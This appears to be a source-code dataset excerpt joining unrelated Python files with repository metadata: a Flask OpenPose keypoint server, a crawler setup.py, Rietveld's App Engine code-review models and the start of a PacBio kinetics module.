    right_hand_keypoints_2d = datum.handKeypoints[1].reshape(-1).tolist()
    hand_left_keypoints_3d = datum.handKeypoints3D[0].tolist()
    hand_right_keypoints_3d = datum.handKeypoints3D[1].tolist()
    """
    if( args.debug ):
        print("pose_keypoints_2d : ", pose_keypoints_2d )
        #print("pose_keypoints_2d[0][0] : ", pose_keypoints_2d[0][0] )
        #print("face_keypoints_2d: ", face_keypoints_2d )
        #print("pose_keypoints_3d: ", pose_keypoints_3d )
        #print("datum.cvOutputData: ", datum.cvOutputData )
    """
    #------------------------------------------
    # Build the JSON response message
    #------------------------------------------
    http_status_code = 200
    response = flask.jsonify(
        {
            "version" : 1.3,
            "people" : [
                {
                    "pose_keypoints_2d" : pose_keypoints_2d,
                    "face_keypoints_2d" : face_keypoints_2d,
                    "hand_left_keypoints_2d" : left_hand_keypoints_2d,
                    "hand_right_keypoints_2d" : right_hand_keypoints_2d,
                    "pose_keypoints_3d" : pose_keypoints_3d,
                    "face_keypoints_3d" : face_keypoints_3d,
                    "hand_left_keypoints_3d" : hand_left_keypoints_3d,
                    "hand_right_keypoints_3d" : hand_right_keypoints_3d,
                }
            ]
        }
    )
    # Attach extra headers to the response (workaround for Access-Control-Allow-Origin errors)
    #response.headers.add('Access-Control-Allow-Origin', '*')
    #response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
    #response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')
    if( app.debug ):
        print( "response.headers : \n", response.headers )
    return response, http_status_code
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    #parser.add_argument('--host', type=str, default="localhost", help="ホスト名(コンテナ名 or コンテナ ID)")
    #parser.add_argument('--host', type=str, default="openpose_ubuntu_gpu_container", help="ホスト名(コンテナ名 or コンテナ ID)")
    parser.add_argument('--host', type=str, default="0.0.0.0", help="ホスト名(コンテナ名 or コンテナ ID)")
    parser.add_argument('--port', type=str, default="5010", help="ポート番号")
    parser.add_argument('--enable_threaded', action='store_true', help="並列処理有効化")
    parser.add_argument('--debug', action='store_true', help="デバッグモード有効化")
    args = parser.parse_args()
    if( args.debug ):
        for key, value in vars(args).items():
            print('%s: %s' % (str(key), str(value)))

    # Ensure the scratch directory used for debug images exists.
    if not os.path.exists("tmp"):
        os.mkdir("tmp")

    # Mirror the CLI flag onto Flask's debug switch.
    app.debug = args.debug

    # BUG FIX: the original if/else was inverted — passing --enable_threaded
    # started the server with threaded=False, and omitting it started it with
    # threaded=True. The flag now enables multi-threaded request handling, as
    # its name and help text intend.
    app.run( host=args.host, port=args.port, threaded=args.enable_threaded )
| [
"[email protected]"
] | |
920d2263cbeb1e5be4d7cfac31f5ccec2fafdc5a | 1f0831db24ae2772d4944faf05289599bb37aca7 | /data_crawling/08/api/setup.py | 4d6fe9c915145a8327f8ea7ba8e946c9660fc6d8 | [] | no_license | smaystr/rails_reactor | 2123f39ae97f38acb647363979fe4a09b896670e | 69c8aac5860527768b4a8b7bce027b9dea6b1989 | refs/heads/master | 2022-08-19T05:35:21.535933 | 2019-08-28T12:46:22 | 2019-08-28T12:46:22 | 189,264,026 | 1 | 0 | null | 2022-07-29T22:34:56 | 2019-05-29T16:47:08 | Jupyter Notebook | UTF-8 | Python | false | false | 660 | py | from setuptools import setup
# Pull the runtime dependency pins from the adjacent requirements file so the
# package metadata always matches what the project actually installs.
with open('requirements.txt') as requirements_file:
    requirements = requirements_file.read().splitlines()

# Package metadata, collected in one mapping and handed to setuptools below.
_metadata = dict(
    name="sergey_milantiev_crawler_master",
    version="0.0.0",
    install_requires=requirements,
    packages=["app"],
    author="[email protected]",
    url="",
    download_url="",
    description="CRAWLER DOMRIA API",
    long_description="",
    license="MIT",
    keywords="",
    classifiers=[
        "Intended Audience :: Developers",
        "Programming Language :: Python",
        "Natural Language :: English",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3.7",
    ],
)

setup(**_metadata)
| [
"[email protected]"
] | |
9235b80e5ef760386db087cbeb1eedcff79edbd7 | def1b645cf84f25f746926771b7798215b505514 | /codereview/models.py | 446f6066db2bf1f7ab0a358eae2b61a87b4fc8ae | [
"Apache-2.0"
] | permissive | ojengwa/codereview | 07770b3dbe9e882749ff013a7dba9241e99b0ad5 | 23e3e6654fc09084724ddaa33d982df98e5e5a7b | refs/heads/master | 2021-01-17T07:27:46.977826 | 2015-10-13T14:46:26 | 2015-10-13T14:46:26 | 51,166,443 | 1 | 0 | null | 2016-02-05T18:40:31 | 2016-02-05T18:40:31 | null | UTF-8 | Python | false | false | 29,543 | py | # Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""App Engine data model (schema) definition for Rietveld."""
import logging
from hashlib import md5
import os
import re
import time
from google.appengine.ext import db
from google.appengine.api import memcache
from google.appengine.api import users
from django.utils.encoding import force_unicode
import engine
import patching
# Selectable context sizes — presumably the number of context lines offered
# when rendering diffs; TODO confirm against the view code that consumes it.
CONTEXT_CHOICES = (3, 10, 25, 50, 75, 100)
# GQL query cache ###
# Maps a full GQL query string to its compiled db.GqlQuery object so that
# gql() below can rebind arguments instead of re-parsing the query.
_query_cache = {}
def gql(cls, clause, *args, **kwds):
    """Return a (possibly cached) GqlQuery for *cls* restricted by *clause*.

    Args:
      cls: a db.Model subclass.
      clause: a query clause, e.g. 'WHERE draft = TRUE'.
      *args, **kwds: positional and keyword arguments to be bound to the
        query.

    Returns:
      A db.GqlQuery instance corresponding to the query, with *args and
      **kwds bound to it.
    """
    query_string = 'SELECT * FROM %s %s' % (cls.kind(), clause)
    try:
        # Fast path: reuse the compiled query for this exact string.
        query = _query_cache[query_string]
    except KeyError:
        query = _query_cache[query_string] = db.GqlQuery(query_string)
    query.bind(*args, **kwds)
    return query
# Issues, PatchSets, Patches, Contents, Comments, Messages ###
class Issue(db.Model):
    """The major top-level entity.

    It has one or more PatchSets as its descendants.
    """
    subject = db.StringProperty(required=True)
    description = db.TextProperty()
    #: in Subversion - repository path (URL) for files in patch set
    base = db.StringProperty()
    #: if True then base files for patches were uploaded with upload.py
    #: (if False - then Rietveld attempts to download them from server)
    local_base = db.BooleanProperty(default=False)
    repo_guid = db.StringProperty()
    owner = db.UserProperty(auto_current_user_add=True, required=True)
    created = db.DateTimeProperty(auto_now_add=True)
    modified = db.DateTimeProperty(auto_now=True)
    reviewers = db.ListProperty(db.Email)
    cc = db.ListProperty(db.Email)
    closed = db.BooleanProperty(default=False)
    private = db.BooleanProperty(default=False)
    # Cached count of non-draft comments; None for rows written by an older
    # schema version (recomputed lazily, see num_comments below).
    n_comments = db.IntegerProperty()
    latest_patch_rev = db.StringProperty(required=False)
    latest_reviewed_rev = db.StringProperty(required=False)
    processing = db.BooleanProperty(default=False)
    # Per-instance cache for the is_starred property; None = not computed yet.
    _is_starred = None

    class Meta:
        # Extra model-level permission string for this entity.
        permissions = (
            ("view_issue", "View issue"),
        )

    @property
    def is_starred(self):
        """Whether the current user has this issue starred."""
        if self._is_starred is not None:
            return self._is_starred
        account = Account.current_user_account
        self._is_starred = account is not None and self.key(
        ).id() in account.stars
        return self._is_starred

    def user_can_edit(self, user):
        """Return true if the given user has permission to edit this issue."""
        # Owners can always edit; others need the change_issue permission.
        return user == self.owner or user.has_perm('codereview.change_issue')

    @property
    def edit_allowed(self):
        """Whether the current user can edit this issue."""
        account = Account.current_user_account
        if account is None:
            return False
        return self.user_can_edit(account.user)

    def update_comment_count(self, n):
        """Increment the n_comments property by n.

        If n_comments in None, compute the count through a query. (This
        is a transitional strategy while the database contains Issues
        created using a previous version of the schema.)
        """
        if self.n_comments is None:
            self.n_comments = self._get_num_comments()
        self.n_comments += n

    @property
    def num_comments(self):
        """The number of non-draft comments for this issue.

        This is almost an alias for self.n_comments, except that if
        n_comments is None, it is computed through a query, and stored,
        using n_comments as a cache.
        """
        if self.n_comments is None:
            self.n_comments = self._get_num_comments()
        return self.n_comments

    def _get_num_comments(self):
        """Helper to compute the number of comments through a query."""
        return gql(Comment,
                   'WHERE ANCESTOR IS :1 AND draft = FALSE',
                   self).count()

    # Per-instance cache for the num_drafts property; None = not computed yet.
    _num_drafts = None

    @property
    def num_drafts(self):
        """The number of draft comments on this issue for the current user.

        The value is expensive to compute, so it is cached.
        """
        if self._num_drafts is None:
            account = Account.current_user_account
            if account is None:
                # Anonymous users cannot have drafts.
                self._num_drafts = 0
            else:
                query = gql(Comment,
                            'WHERE ANCESTOR IS :1 AND author = :2 AND draft = TRUE',
                            self, account.user)
                self._num_drafts = query.count()
        return self._num_drafts

    @property
    def patchsets(self):
        """Get issue patchsets in order."""
        return self.patchset_set.order('created')

    @property
    def latest_patchset(self):
        """Get latest patchset."""
        try:
            return self.patchsets.reverse()[0]
        except IndexError:
            # No patchsets have been uploaded yet.
            return None

    @property
    def latest_patchset_number(self):
        """Get latest patchset number (1-based)."""
        try:
            return list(self.patchsets).index(self.latest_patchset) + 1
        except ValueError:
            return None

    @property
    def latest_approved_patchset(self):
        """Get latest approved patchset.

        NOTE(review): implicitly returns None when latest_reviewed_rev is
        unset (falsy), not only when the filtered query comes back empty.
        """
        if self.latest_reviewed_rev:
            try:
                return self.patchsets.reverse().filter(revision=self.latest_reviewed_rev)[0]
            except IndexError:
                return None

    @property
    def latest_approved_patchset_number(self):
        """Get latest approved patchset number (1-based)."""
        try:
            return list(self.patchsets).index(self.latest_approved_patchset) + 1
        except ValueError:
            return None
class PatchSet(db.Model):
    """A set of patchset uploaded together.

    This is a descendant of an Issue and has Patches as descendants.
    """
    issue = db.ReferenceProperty(Issue)  # == parent
    message = db.StringProperty()
    data = db.TextProperty()  # blob
    url = db.LinkProperty()
    created = db.DateTimeProperty(auto_now_add=True)
    modified = db.DateTimeProperty(auto_now=True)
    # Comment counter; defaults to 0 for new rows, but rows written by an
    # older schema version may hold None (handled in num_comments below).
    n_comments = db.IntegerProperty(default=0)
    revision = db.StringProperty(required=False)

    class Meta:
        # Extra model-level permission string for this entity.
        permissions = (
            ("approve_patchset", "Approve patchset"),
        )

    def update_comment_count(self, n):
        """Increment the n_comments property by n."""
        self.n_comments = self.num_comments + n

    @property
    def num_comments(self):
        """The number of non-draft comments for this issue.

        This is almost an alias for self.n_comments, except that if
        n_comments is None, 0 is returned.
        """
        # For older patchsets n_comments is None.
        return self.n_comments or 0
class Message(db.Model):
    """A copy of a message sent out in email.

    This is a descendant of an Issue.
    """
    issue = db.ReferenceProperty(Issue)  # == parent
    subject = db.StringProperty()
    sender = db.EmailProperty()
    recipients = db.ListProperty(db.Email)
    date = db.DateTimeProperty(auto_now_add=True)
    text = db.TextProperty()
    draft = db.BooleanProperty(default=False)
    # Per-instance cache for the approval property; None = not computed yet.
    _approval = None

    @property
    def approval(self):
        """Is True when the message represents an approval of the review.

        Approval means some non-quoted line contains 'lgtm'
        (case-insensitive) and the sender is not the issue owner.
        """
        if self._approval is None:
            # Must contain 'lgtm' in a line that doesn't start with '>'.
            self._approval = any(
                True for line in self.text.lower().splitlines()
                if not line.strip().startswith('>') and 'lgtm' in line)
            # Must not be issue owner.
            self._approval &= self.issue.owner.email() != self.sender
        return self._approval
class Content(db.Model):
    """The content of a text file.

    This is a descendant of a Patch.
    """
    # parent => Patch
    text = db.TextProperty()  # decoded text content (for text files)
    data = db.TextProperty()  # blob: raw bytes (for binary files)
    # Checksum over text or data depending on the type of this content.
    checksum = db.TextProperty()
    is_uploaded = db.BooleanProperty(default=False)  # content arrives via upload, possibly later
    is_bad = db.BooleanProperty(default=False)  # upload was corrupt; must be re-uploaded
    file_too_large = db.BooleanProperty(default=False)
    @property
    def lines(self):
        """The text split into lines, retaining line endings."""
        if not self.text:
            return []
        return self.text.splitlines(True)
class Patch(db.Model):
    """A single patch, i.e. a set of changes to a single file.

    This is a descendant of a PatchSet.
    """
    patchset = db.ReferenceProperty(PatchSet)  # == parent entity
    filename = db.StringProperty()
    old_filename = db.StringProperty()  # pre-rename name, when the file was moved
    status = db.StringProperty()  # 'A', 'A +', 'M', 'D' etc
    text = db.TextProperty()  # the diff text for this file
    content = db.ReferenceProperty(Content)  # base file content
    patched_content = db.ReferenceProperty(
        Content, collection_name='patch2_set')  # content after applying the patch
    is_binary = db.BooleanProperty(default=False)
    # Ids of patchsets that have a different version of this file.
    delta = db.ListProperty(int)
    delta_calculated = db.BooleanProperty(default=False)
    # Per-instance cache for the lines property.
    _lines = None
    @property
    def lines(self):
        """The patch split into lines, retaining line endings.
        The value is cached.
        """
        if self._lines is not None:
            return self._lines
        if not self.text:
            lines = []
        else:
            lines = self.text.splitlines(True)
        self._lines = lines
        return lines
    _property_changes = None
    @property
    def property_changes(self):
        """The property changes split into lines.
        The value is cached.
        """
        if self._property_changes is not None:
            return self._property_changes
        self._property_changes = []
        # svn emits a "Property changes on: <path>" banner followed by a
        # 67-underscore separator line; everything after it is property text.
        match = re.search(
            '^Property changes on.*\n' + '_' * 67 + '$', self.text,
            re.MULTILINE)
        if match:
            self._property_changes = self.text[match.end():].splitlines()
        return self._property_changes
    _num_added = None
    @property
    def num_added(self):
        """The number of line additions in this patch.
        The value is cached.
        """
        if self._num_added is None:
            # -1 discounts the '+++' file-header line of the unified diff
            # (assumption from the counting scheme -- confirm for edge formats).
            self._num_added = self.count_startswith('+') - 1
        return self._num_added
    _num_removed = None
    @property
    def num_removed(self):
        """The number of line removals in this patch.
        The value is cached.
        """
        if self._num_removed is None:
            # -1 discounts the '---' file-header line, as in num_added.
            self._num_removed = self.count_startswith('-') - 1
        return self._num_removed
    _num_chunks = None
    @property
    def num_chunks(self):
        """The number of 'chunks' in this patch.
        A chunk is a block of lines starting with '@@'.
        The value is cached.
        """
        if self._num_chunks is None:
            self._num_chunks = self.count_startswith('@@')
        return self._num_chunks
    _num_comments = None
    @property
    def num_comments(self):
        """The number of non-draft comments for this patch.
        The value is cached.
        """
        if self._num_comments is None:
            self._num_comments = gql(Comment,
                                     'WHERE patch = :1 AND draft = FALSE',
                                     self).count()
        return self._num_comments
    _num_drafts = None
    @property
    def num_drafts(self):
        """The number of draft comments on this patch for the current user.
        The value is expensive to compute, so it is cached.
        """
        if self._num_drafts is None:
            account = Account.current_user_account
            if account is None:
                # Anonymous viewers have no drafts by definition.
                self._num_drafts = 0
            else:
                query = gql(Comment,
                            'WHERE patch = :1 AND draft = TRUE AND author = :2',
                            self, account.user)
                self._num_drafts = query.count()
        return self._num_drafts
    def count_startswith(self, prefix):
        """Returns the number of lines with the specified prefix."""
        return len([l for l in self.lines if l.startswith(prefix)])
    def get_content(self):
        """Get self.content, or fetch it if necessary.

        This is the content of the file to which this patch is relative.

        Returns:
          a Content instance.

        Raises:
          engine.FetchError: If there was a problem fetching it.
        """
        try:
            if self.content is not None:
                if self.content.is_bad:
                    msg = 'Bad content. Try to upload again.'
                    logging.warn('Patch.get_content: %s', msg)
                    raise engine.FetchError(msg)
                if self.content.is_uploaded and self.content.text is None:
                    # Content entity exists but its text has not arrived yet.
                    msg = 'Upload in progress.'
                    logging.warn('Patch.get_content: %s', msg)
                    raise engine.FetchError(msg)
                else:
                    return self.content
        except db.Error:
            # This may happen when a Content entity was deleted behind our
            # back.
            self.content = None
        # No usable content reference: fetch the base file and persist it.
        content = engine.FetchBase(self.patchset.issue.base, self)
        content.put()
        self.content = content
        self.put()
        return content
    def get_patched_content(self):
        """Get self.patched_content, computing it if necessary.

        This is the content of the file after applying this patch.

        Returns:
          a Content instance.

        Raises:
          engine.FetchError: If there was a problem fetching the old content.
        """
        try:
            if self.patched_content is not None:
                return self.patched_content
        except db.Error:
            # This may happen when a Content entity was deleted behind our
            # back.
            self.patched_content = None
        old_lines = self.get_content().text.splitlines(True)
        logging.info('Creating patched_content for %s', self.filename)
        chunks = patching.ParsePatchToChunks(self.lines, self.filename)
        new_lines = []
        for _, _, new in patching.PatchChunks(old_lines, chunks):
            new_lines.extend(new)
        text = db.Text(''.join(new_lines))
        # Persist the computed result so it is only ever computed once.
        patched_content = Content(text=text, parent=self)
        patched_content.put()
        self.patched_content = patched_content
        self.put()
        return patched_content
    @property
    def no_base_file(self):
        """Returns True iff the base file is not available."""
        return self.content and self.content.file_too_large
class Comment(db.Model):
    """A Comment for a specific line of a specific file.

    This is a descendant of a Patch.
    """
    patch = db.ReferenceProperty(Patch)  # == parent entity
    message_id = db.StringProperty()  # == key_name
    author = db.UserProperty(auto_current_user_add=True)
    date = db.DateTimeProperty(auto_now=True)
    lineno = db.IntegerProperty()
    text = db.TextProperty()
    left = db.BooleanProperty()  # True when attached to the left (old) side of the diff
    draft = db.BooleanProperty(required=True, default=True)
    # Computed by complete(); never stored in the datastore.
    buckets = None
    shorttext = None
    def complete(self):
        """Set the shorttext and buckets attributes."""
        # TODO(guido): Turn these into caching properties instead.
        # The strategy for buckets is that we want groups of lines that
        # start with > to be quoted (and not displayed by
        # default). Whitespace-only lines are not considered either quoted
        # or not quoted. Same goes for lines that go like "On ... user
        # wrote:".
        cur_bucket = []
        quoted = None
        self.buckets = []
        # Closure flushing the lines accumulated so far into a Bucket.
        # It reads cur_bucket/quoted from the enclosing scope, so the
        # rebinding of cur_bucket below is deliberate.
        def _Append():
            if cur_bucket:
                self.buckets.append(Bucket(text="\n".join(cur_bucket),
                                           quoted=bool(quoted)))
        lines = self.text.splitlines()
        for line in lines:
            if line.startswith("On ") and line.endswith(":"):
                # Attribution line: neither quoted nor unquoted; keep bucket open.
                pass
            elif line.startswith(">"):
                if quoted is False:
                    # Transition unquoted -> quoted: flush the current bucket.
                    _Append()
                    cur_bucket = []
                quoted = True
            elif line.strip():
                if quoted is True:
                    # Transition quoted -> unquoted: flush the current bucket.
                    _Append()
                    cur_bucket = []
                quoted = False
            cur_bucket.append(line)
        _Append()
        self.shorttext = self.text.lstrip()[:50].rstrip()
        # Grab the first 50 chars from the first non-quoted bucket
        for bucket in self.buckets:
            if not bucket.quoted:
                self.shorttext = bucket.text.lstrip()[:50].rstrip()
                break
class Bucket(db.Model):
    """A 'Bucket' of text.

    A comment may consist of multiple text buckets, some of which may be
    collapsed by default (when they represent quoted text).

    NOTE: This entity is never written to the database. See Comment.complete().
    """
    # TODO(guido): Flesh this out.
    text = db.TextProperty()
    quoted = db.BooleanProperty()  # True when this bucket is quoted reply text
# Repositories and Branches ###
class Repository(db.Model):
    """A specific Subversion repository."""
    name = db.StringProperty(required=True)
    url = db.LinkProperty(required=True)
    owner = db.UserProperty(auto_current_user_add=True)
    guid = db.StringProperty()  # global unique repository id
    def __str__(self):
        # Human-readable representation used in admin/choice listings.
        return self.name
class Branch(db.Model):
    """A trunk, branch, or a tag in a specific Subversion repository."""
    repo = db.ReferenceProperty(Repository, required=True)
    # Cache repo.name as repo_name, to speed up set_branch_choices()
    # in views.IssueBaseForm.
    repo_name = db.StringProperty()
    category = db.StringProperty(required=True,
                                 choices=('*trunk*', 'branch', 'tag'))
    name = db.StringProperty(required=True)
    url = db.LinkProperty(required=True)
    owner = db.UserProperty(auto_current_user_add=True)
# Accounts ###
class Account(db.Model):
    """Maps a user or email address to a user-selected nickname, and more.

    Nicknames do not have to be unique.

    The default nickname is generated from the email address by
    stripping the first '@' sign and everything after it. The email
    should not be empty nor should it start with '@' (AssertionError
    error is raised if either of these happens).

    This also holds a list of ids of starred issues. The expectation
    that you won't have more than a dozen or so starred issues (a few
    hundred in extreme cases) and the memory used up by a list of
    integers of that size is very modest, so this is an efficient
    solution. (If someone found a use case for having thousands of
    starred issues we'd have to think of a different approach.)
    """
    user = db.UserProperty(auto_current_user_add=True, required=True)
    email = db.EmailProperty(required=True)  # key == <email>
    nickname = db.StringProperty(required=True)
    default_context = db.IntegerProperty(default=engine.DEFAULT_CONTEXT,
                                         choices=CONTEXT_CHOICES)
    default_column_width = db.IntegerProperty(
        default=engine.DEFAULT_COLUMN_WIDTH)
    created = db.DateTimeProperty(auto_now_add=True)
    modified = db.DateTimeProperty(auto_now=True)
    stars = db.ListProperty(int)  # Issue ids of all starred issues
    fresh = db.BooleanProperty()
    uploadpy_hint = db.BooleanProperty(default=True)
    notify_by_email = db.BooleanProperty(default=True)
    notify_by_chat = db.BooleanProperty(default=False)
    use_code_highlight = db.BooleanProperty(default=False)
    # Current user's Account.  Updated by
    # middleware.AddUserToRequestMiddleware.
    current_user_account = None
    lower_email = db.StringProperty()
    lower_nickname = db.StringProperty()
    xsrf_secret = db.TextProperty()  # blob
    # FogBugz authorization token.
    fogbugz_token = db.StringProperty()
    # Note that this doesn't get called when doing multi-entity puts.
    def put(self):
        """Persist the account, keeping the lower-cased lookup fields in sync."""
        self.lower_email = str(self.email).lower()
        self.lower_nickname = self.nickname.lower()
        super(Account, self).put()
    @classmethod
    def get_account_for_user(cls, user):
        """Get the Account for a user, creating a default one if needed."""
        email = user.email()
        assert email
        key = '<%s>' % email
        # Since usually the account already exists, first try getting it
        # without the transaction implied by get_or_insert().
        account = cls.get_by_key_name(key)
        if account is not None:
            return account
        nickname = cls.create_nickname_for_user(user)
        return cls.get_or_insert(
            key, user=user, email=email, nickname=nickname,
            fresh=True)
    @classmethod
    def create_nickname_for_user(cls, user):
        """Returns a unique nickname for a user."""
        name = nickname = user.email().split('@', 1)[0]
        next_char = chr(ord(nickname[0].lower()) + 1)
        # One range query fetches every nickname that could collide; the
        # uniqueness loop below then runs entirely in memory.
        existing_nicks = [account.lower_nickname
                          for account in cls.gql(('WHERE lower_nickname >= :1 AND '
                                                  'lower_nickname < :2'),
                                                 nickname.lower(), next_char)]
        suffix = 0
        while nickname.lower() in existing_nicks:
            suffix += 1
            nickname = '%s%d' % (name, suffix)
        return nickname
    @classmethod
    def get_nickname_for_user(cls, user):
        """Get the nickname for a user."""
        return cls.get_account_for_user(user).nickname
    @classmethod
    def get_account_for_email(cls, email):
        """Get the Account for an email address, or return None."""
        assert email
        key = '<%s>' % email
        return cls.get_by_key_name(key)
    @classmethod
    def get_accounts_for_emails(cls, emails):
        """Get the Accounts for each of a list of email addresses."""
        return cls.get_by_key_name(['<%s>' % email for email in emails])
    @classmethod
    def get_by_key_name(cls, key, **kwds):
        """Override db.Model.get_by_key_name() to use cached value if possible."""
        if not kwds and cls.current_user_account is not None:
            if key == cls.current_user_account.key().name():
                return cls.current_user_account
        return super(Account, cls).get_by_key_name(key, **kwds)
    @classmethod
    def get_multiple_accounts_by_email(cls, emails):
        """Get multiple accounts.  Returns a dict by email."""
        results = {}
        keys = []
        for email in emails:
            if cls.current_user_account and email == cls.current_user_account.email:
                results[email] = cls.current_user_account
            else:
                keys.append('<%s>' % email)
        if keys:
            accounts = cls.get_by_key_name(keys)
            for account in accounts:
                if account is not None:
                    results[account.email] = account
        return results
    @classmethod
    def get_nickname_for_email(cls, email, default=None):
        """Get the nickname for an email address, possibly a default.

        If default is None a generic nickname is computed from the email
        address.

        Args:
          email: email address.
          default: If given and no account is found, returned as the default value.
        Returns:
          Nickname for given email.
        """
        account = cls.get_account_for_email(email)
        if account is not None and account.nickname:
            return account.nickname
        if default is not None:
            return default
        return email.replace('@', '_')
    @classmethod
    def get_account_for_nickname(cls, nickname):
        """Get the list of Accounts that have this nickname."""
        assert nickname
        assert '@' not in nickname
        return cls.all().filter('lower_nickname =', nickname.lower()).get()
    @classmethod
    def get_email_for_nickname(cls, nickname):
        """Turn a nickname into an email address.

        If the nickname is not unique or does not exist, this returns None.
        """
        account = cls.get_account_for_nickname(nickname)
        if account is None:
            return None
        return account.email
    def user_has_selected_nickname(self):
        """Return True if the user picked the nickname.

        Normally this returns 'not self.fresh', but if that property is
        None, we assume that if the created and modified timestamp are
        within 2 seconds, the account is fresh (i.e. the user hasn't
        selected a nickname yet). We then also update self.fresh, so it
        is used as a cache and may even be written back if we're lucky.
        """
        if self.fresh is None:
            delta = self.created - self.modified
            # Simulate delta = abs(delta)
            if delta.days < 0:
                delta = -delta
            self.fresh = (delta.days == 0 and delta.seconds < 2)
        return not self.fresh
    _drafts = None
    @property
    def drafts(self):
        """A list of issue ids that have drafts by this user.

        This is cached in memcache.
        """
        if self._drafts is None:
            if self._initialize_drafts():
                self._save_drafts()
        return self._drafts
    def update_drafts(self, issue, have_drafts=None):
        """Update the user's draft status for this issue.

        Args:
          issue: an Issue instance.
          have_drafts: optional bool forcing the draft status.  By default,
            issue.num_drafts is inspected (which may query the datastore).

        The Account is written to the datastore if necessary.
        """
        dirty = False
        if self._drafts is None:
            dirty = self._initialize_drafts()
        id = issue.key().id()
        if have_drafts is None:
            # Beware, this may do a query.
            have_drafts = bool(issue.num_drafts)
        if have_drafts:
            if id not in self._drafts:
                self._drafts.append(id)
                dirty = True
        else:
            if id in self._drafts:
                self._drafts.remove(id)
                dirty = True
        if dirty:
            self._save_drafts()
    def _initialize_drafts(self):
        """Initialize self._drafts from scratch.

        This mostly exists as a schema conversion utility.

        Returns:
          True if the user should call self._save_drafts(), False if not.
        """
        drafts = memcache.get('user_drafts:' + self.email)
        if drafts is not None:
            self._drafts = drafts
            # logging.info('HIT: %s -> %s', self.email, self._drafts)
            return False
        # We're looking for the Issue key id.  The ancestry of comments goes:
        # Issue -> PatchSet -> Patch -> Comment.
        issue_ids = set(comment.key().parent().parent().parent().id()
                        for comment in gql(Comment,
                                           'WHERE author = :1 AND draft = TRUE',
                                           self.user))
        self._drafts = list(issue_ids)
        # logging.info('INITIALIZED: %s -> %s', self.email, self._drafts)
        return True
    def _save_drafts(self):
        """Save self._drafts to memcache."""
        # logging.info('SAVING: %s -> %s', self.email, self._drafts)
        memcache.set('user_drafts:' + self.email, self._drafts, 3600)
    def get_xsrf_token(self, offset=0):
        """Return an XSRF token for the current user."""
        # This code assumes that
        # self.user.email() == users.get_current_user().email()
        current_user = users.get_current_user()
        if self.user.id != current_user.id:
            # Mainly for Google Account plus conversion.
            logging.info('Updating user_id for %s from %s to %s' % (
                self.user.email(), self.user.id, current_user.id))
            self.user = current_user
            self.put()
        if not self.xsrf_secret:
            xsrf_secret = os.urandom(8)
            self.xsrf_secret = xsrf_secret
            self.put()
        m = md5(
            force_unicode(self.xsrf_secret).encode('utf-8') if isinstance(self.xsrf_secret, unicode)
            else self.xsrf_secret)
        email_str = self.lower_email
        if isinstance(email_str, unicode):
            email_str = email_str.encode('utf-8')
        # BUGFIX: hash the UTF-8 encoded email computed above; the previous
        # code hashed self.lower_email directly, leaving email_str unused and
        # failing for non-ASCII addresses (md5.update needs byte strings).
        m.update(email_str)
        when = int(time.time()) // 3600 + offset
        m.update(str(when))
        return m.hexdigest()
| [
"[email protected]"
] | |
8589d9bd7373b78746960b04f357c76a95469f96 | 3e24611b7315b5ad588b2128570f1341b9c968e8 | /pacbiolib/pacbio/pythonpkgs/kineticsTools/lib/python2.7/site-packages/kineticsTools/WorkerProcess.py | 8f942b04b941bca938157f82b6d7dc6e0aca26f1 | [
"BSD-2-Clause"
] | permissive | bioCKO/lpp_Script | dc327be88c7d12243e25557f7da68d963917aa90 | 0cb2eedb48d4afa25abc2ed7231eb1fdd9baecc2 | refs/heads/master | 2022-02-27T12:35:05.979231 | 2019-08-27T05:56:33 | 2019-08-27T05:56:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,249 | py | #################################################################################
# Copyright (c) 2011-2013, Pacific Biosciences of California, Inc.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Pacific Biosciences nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY
# THIS LICENSE. THIS SOFTWARE IS PROVIDED BY PACIFIC BIOSCIENCES AND ITS
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL PACIFIC BIOSCIENCES OR
# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#################################################################################
import cProfile
import logging
import os.path
import copy
from multiprocessing import Process
from multiprocessing.process import current_process
from threading import Thread, Event
from urlparse import urlparse
import warnings
import numpy as np
import pbcore.io
from pbcore.io.opener import (openAlignmentFile, openIndexedAlignmentFile)
# FIXME this should ultimately go somewhere else. actually, so should the
# rest of this module.
def _openFiles(self, refFile=None, sharedIndices=None):
    """
    Hack to enable sharing of indices (but not filehandles!) between dataset
    instances.

    Opens one reader per external resource, preferring the indexed reader
    and falling back to the plain one when the .pbi index is missing.
    """
    log = logging.getLogger()
    log.debug("Opening resources")
